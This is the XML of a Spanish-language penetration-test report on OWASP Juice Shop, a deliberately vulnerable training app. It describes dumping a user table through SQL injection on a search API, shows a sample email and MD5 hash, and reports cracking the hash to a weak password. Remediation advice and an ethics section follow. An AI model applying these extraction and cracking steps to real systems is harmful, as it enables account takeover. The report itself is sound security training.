        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ejemplo de credenciales extraídas:</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="004D2CAB" w:rsidRPr="0076040B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>J12934@juice-sh.op</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004D2CAB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="004D2CAB" w:rsidRPr="004D2CAB">
        <w:t>0192023a7bbd73250516f069df18b500</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:t>. Se obtuvo la tabla Users con columnas email y password. Las contraseñas están hasheadas con MD5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6282D9BD" w14:textId="4E6AA77E" w:rsidR="00D02579" w:rsidRPr="007D7E61" w:rsidRDefault="00D02579" w:rsidP="00D02579">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CA87DFD" wp14:editId="683D69DD">
            <wp:extent cx="5762625" cy="800100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="309003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6" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5762625" cy="800100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC45A28" w14:textId="77777777" w:rsidR="002426EF" w:rsidRPr="002C1BDB" w:rsidRDefault="007D7E61" w:rsidP="002C1BDB">
      <w:pPr>
        <w:pStyle w:val="Estilo1"/>
      </w:pPr>
      <w:r w:rsidRPr="002C1BDB">
        <w:rPr>
          <w:rStyle w:val="Estilo1Car"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Crackeo de Contraseñas (Opcional)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1BDB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69958DF4" w14:textId="335E7BE9" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:t>Se realizó un intento de descifrar el hash de la contraseña extraída (</w:t>
      </w:r>
      <w:r w:rsidR="004D2CAB" w:rsidRPr="004D2CAB">
        <w:t>0192023a7bbd73250516f069df18b500</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:t>) utilizando la herramienta online CrackStation.net.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2973B397" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:t>Proceso: Se ingresó el hash MD5 en la plataforma web de CrackStation.net para intentar su descifrado mediante tablas arcoíris y otras técnicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BD7B8D" w14:textId="2B3AE0DC" w:rsidR="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:t xml:space="preserve">Resultado: El hash </w:t>
      </w:r>
      <w:r w:rsidR="004D2CAB" w:rsidRPr="004D2CAB">
        <w:t>0192023a7bbd73250516f069df18b500</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:t xml:space="preserve"> fue exitosamente crackeado, revelando que la contraseña original es admin123. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035FAA1B" w14:textId="68AA6CED" w:rsidR="00D02579" w:rsidRPr="007D7E61" w:rsidRDefault="00D02579" w:rsidP="00D02579">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D21AEEA" wp14:editId="721E9681">
            <wp:extent cx="5619750" cy="1951302"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12161794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79441" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5656809" cy="1964170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4297DF8A" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tabla de Vulnerabilidades:</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">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0"/>
        <w:gridCol w:w="2954"/>
        <w:gridCol w:w="806"/>
        <w:gridCol w:w="3580"/>
      </w:tblGrid>
      <w:tr w:rsidR="007D7E61" w:rsidRPr="007D7E61" w14:paraId="25E1076C" w14:textId="77777777" w:rsidTr="007D7E61">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57678D4B" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D7E61">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vulnerabilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AA4601F" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D7E61">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F0851FD" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D7E61">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Riesgo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D3E30C1" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D7E61">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Recomendación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D7E61" w:rsidRPr="007D7E61" w14:paraId="5241CB25" w14:textId="77777777" w:rsidTr="007D7E61">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44E693A0" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
            <w:r w:rsidRPr="007D7E61">
              <w:t>Inyección SQL en API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CBA2F59" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
            <w:r w:rsidRPr="007D7E61">
              <w:t xml:space="preserve">Parámetro q sin sanitizar permite extracción de datos </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DB75B72" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
            <w:r w:rsidRPr="007D7E61">
              <w:t>Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E3C16C2" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
            <w:r w:rsidRPr="007D7E61">
              <w:t xml:space="preserve">Implementar consultas parametrizadas y validación de entrada </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D7E61" w:rsidRPr="007D7E61" w14:paraId="1A56A4EB" w14:textId="77777777" w:rsidTr="007D7E61">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="411B2CE6" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
            <w:r w:rsidRPr="007D7E61">
              <w:t>Hashing obsoleto (MD5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A9640F5" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
            <w:r w:rsidRPr="007D7E61">
              <w:t xml:space="preserve">Contraseñas almacenadas con algoritmo vulnerable </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0146C2D6" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
            <w:r w:rsidRPr="007D7E61">
              <w:t>Medio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12AD3854" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
            <w:r w:rsidRPr="007D7E61">
              <w:t xml:space="preserve">Migrar a bcrypt o Argon2 y exigir contraseñas robustas </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DB4CB12" w14:textId="77777777" w:rsidR="004D2CAB" w:rsidRDefault="004D2CAB" w:rsidP="007D7E61">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CEAB909" w14:textId="0A8C4BC9" w:rsidR="002426EF" w:rsidRDefault="007D7E61" w:rsidP="002C1BDB">
      <w:pPr>
        <w:pStyle w:val="Estilo1"/>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Recomendaciones Técnicas </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A67A131" w14:textId="336B7816" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:r w:rsidRPr="007D7E61">
        <w:t>Para mitigar las vulnerabilidades encontradas, se recomienda:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149F8BB0" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:t>Validar y sanitizar todos los parámetros de entrada en la aplicación web, especialmente en endpoints de API como /rest/products/search?q=.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BEA795" w14:textId="1A80BADE" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:t>Emplear consultas parametrizadas en la base de datos para prevenir inyecciones SQL, en lugar de concatenar directamente las consultas SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782FC9A4" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:t>Actualizar el esquema de almacenamiento de contraseñas para usar algoritmos de hashing modernos y robustos como bcrypt o Argon2, que son resistentes a ataques de fuerza bruta y diccionarios, y salar adecuadamente los hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C579E40" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:t>Realizar auditorías de seguridad periódicas y pruebas de penetración (pentesting) para identificar y corregir vulnerabilidades de forma proactiva.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05774983" w14:textId="77777777" w:rsidR="002426EF" w:rsidRPr="007D7E61" w:rsidRDefault="002426EF" w:rsidP="002426EF"/>
    <w:p w14:paraId="15A55BB5" w14:textId="472BFD00" w:rsidR="002426EF" w:rsidRPr="002426EF" w:rsidRDefault="007D7E61" w:rsidP="002C1BDB">
      <w:pPr>
        <w:pStyle w:val="Estilo1"/>
      </w:pPr>
      <w:r w:rsidRPr="002426EF">
        <w:t>Reflexión Ética y Profesional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285ED8E4" w14:textId="109A9727" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:r w:rsidRPr="007D7E61">
        <w:t>La auditoría se llevó a cabo exclusivamente en un entorno aislado y controlado (OWASP Juice Shop desplegado en Docker), evitando cualquier interacción o afectación fuera del alcance autorizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B35BEC" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:r w:rsidRPr="007D7E61">
        <w:t>Durante la ejecución del pentest, se respetaron los principios de confidencialidad de la información (no se divulgaron datos reales fuera del informe controlado), minimización del riesgo (se realizaron solo las acciones necesarias para confirmar y evidenciar las vulnerabilidades), y entrega de informes transparentes y profesionales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065A791E" w14:textId="77777777" w:rsidR="009A465E" w:rsidRDefault="009A465E"/>
    <w:sectPr w:rsidR="009A465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482D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="03B2048E"/>
    <w:lvl w:ilvl="0" w:tplc="11BE05B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Estilo1"/>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E4711D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7796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B17B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D35AE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B1401"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="62FC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683A53"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8CA0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23E52"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E8C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878F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6634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1419A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F57AD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FB3106"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="759A09B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6CE43B10"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3640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711995">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="282613520">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1861429369">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1239633673">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2057389140">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1454131465">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1484664421">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1798644833">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1939023528">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1748645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E61"/>
    <w:rsid w:val="00037CAF"/>
    <w:rsid w:val="002426EF"/>
    <w:rsid w:val="002C1BDB"/>
    <w:rsid w:val="002F0975"/>
    <w:rsid w:val="003E3161"/>
    <w:rsid w:val="004D2CAB"/>
    <w:rsid w:val="007D7E61"/>
    <w:rsid w:val="009A465E"/>
    <w:rsid w:val="00A4157F"/>
    <w:rsid w:val="00D02579"/>
    <w:rsid w:val="00E2677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16AFE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{249FF21A-15F7-46BE-AF11-BF37640F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7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D7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D7E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D7E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D7E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D7E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D7E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D7E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D7E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7E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D7E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D7E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D7E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D7E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D7E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D7E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D7E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D7E61"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TtuloCar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="007D7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E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7E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D7E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D7E61"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CitaCar">
    <w:name w:val="Cita Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Cita"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="007D7E61"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="007D7E61"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="nfasisintenso">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="007D7E61"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citadestacada">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CitadestacadaCar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="007D7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D7E61"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Referenciaintensa">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="007D7E61"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D2CAB"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mencinsinresolver">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D2CAB"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Estilo1">
    <w:name w:val="Estilo1"/>
    <w:basedOn w:val="Ttulo3"/>
    <w:link w:val="Estilo1Car"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="002C1BDB"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="10"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Estilo1Car">
    <w:name w:val="Estilo1 Car"/>
    <w:basedOn w:val="Ttulo3Car"/>
    <w:link w:val="Estilo1"/>
    <w:rsid w:val="002C1BDB"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0F476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813519">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="527530370">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1557550373">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="877667837">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1075666732">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                    <w:div w:id="7722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05675">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1586495607">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1588003662">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
